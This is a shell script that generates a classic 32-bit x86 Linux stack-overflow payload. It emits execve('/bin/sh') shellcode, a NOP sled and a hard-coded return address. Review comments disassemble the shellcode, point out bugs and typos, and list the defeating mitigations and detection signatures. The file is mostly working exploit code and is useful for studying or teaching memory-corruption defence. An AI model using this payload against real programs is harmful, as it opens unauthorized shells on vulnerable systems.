#!/bin/sh
# NOTE(review): the `//` lines in this file (three below, one before the final
# printf) are NOT comments in sh — only `#` starts a comment. The shell tries
# to run `//` as a command, reports the failure on stderr and, with no
# `set -e`, carries on, so the bytes are still emitted. They are kept verbatim
# here; only `#` comments have been added.
#
# What this file is: a proof-of-concept payload generator for a classic
# 32-bit x86 Linux stack buffer overflow. It writes to stdout, in order:
# a 24-byte execve("/bin/sh") stub, 80 NOP bytes, and a hard-coded 4-byte
# address. The vulnerable program and the way it consumes this input are
# not part of this file.
#
# Defender's view: the technique relies on an executable stack, a fixed and
# guessable stack address, and no stack canary. NX/DEP, ASLR and
# -fstack-protector each defeat it independently. The long run of 0x90 (a
# NOP sled) and the "//bin/sh" push sequence below are well-known byte
# signatures for IDS/AV and memory-scanning detection.

// shellscript that overwrites the buffer with 

// some payload for opening a shell (the payload

// cannot contain any \x00)


# In sh, double quotes do not decode \xHH, so this variable holds the literal
# escape TEXT; it is printf (below) that turns it into raw bytes.
shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 

# 24 bytes of shellcode
# Summary of the listing below: eax is zeroed and pushed (the string's NUL
# terminator), then "n/sh" and "//bi" are pushed so the stack holds
# "//bin/sh\0" ("//" pads the path to 8 bytes, avoiding a \x00 in the
# code). ebx = pointer to that string; cltd sign-extends eax=0 into edx
# (envp = NULL); pushing edx then ebx builds argv = {path, NULL} and ecx
# points at it; al = 0xb selects execve on i386 Linux; int $0x80 invokes it.

# "\x31\xc0"                      // xorl         %eax,%eax

# "\x50"                          // pushl        %eax

# "\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e

# "\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f

# "\x89\xe3"                      // movl         %esp,%ebx

# "\x99"                          // cltd

# "\x52"                          // pushl        %edx

# "\x53"                          // pushl        %ebx

# "\x89\xe1"                      // movl         %esp,%ecx

# "\xb0\x0b"                      // movb         $0xb,%al

# "\xcd\x80"                      // int          $0x80


# 80 bytes of 0x90 (x86 NOP), produced by perl as RAW bytes, not escape text.
# Note the shellcode precedes the sled here, not the usual sled-then-code.
# (Backticks are the legacy form of command substitution; $(...) is the
# modern equivalent — left unchanged.)
padding=`perl -e 'print "\x90" x 80'`

# NOTE(review): "need s correct address" — typo for "a correct address";
# this line is also a `//` pseudo-comment, see the note at the top.
// need s correct address in order to run

# NOTE(review): the unquoted $shellcode$padding becomes printf's FORMAT
# string, and printf decodes the \xHH escapes from $shellcode. \xHH in a
# printf format is a bash/GNU extension; under a strict POSIX sh the escapes
# may be emitted literally rather than as bytes — confirm against the shell
# actually used. The trailing "\xe8\xf8\xff\xbf" is a little-endian 32-bit
# value (0xbffffff8), i.e. a fixed pre-ASLR stack address. The four trailing
# \x00 bytes contradict the "cannot contain any \x00" remark above; whether
# they are ever copied depends on the target program, which this file does
# not show.
printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
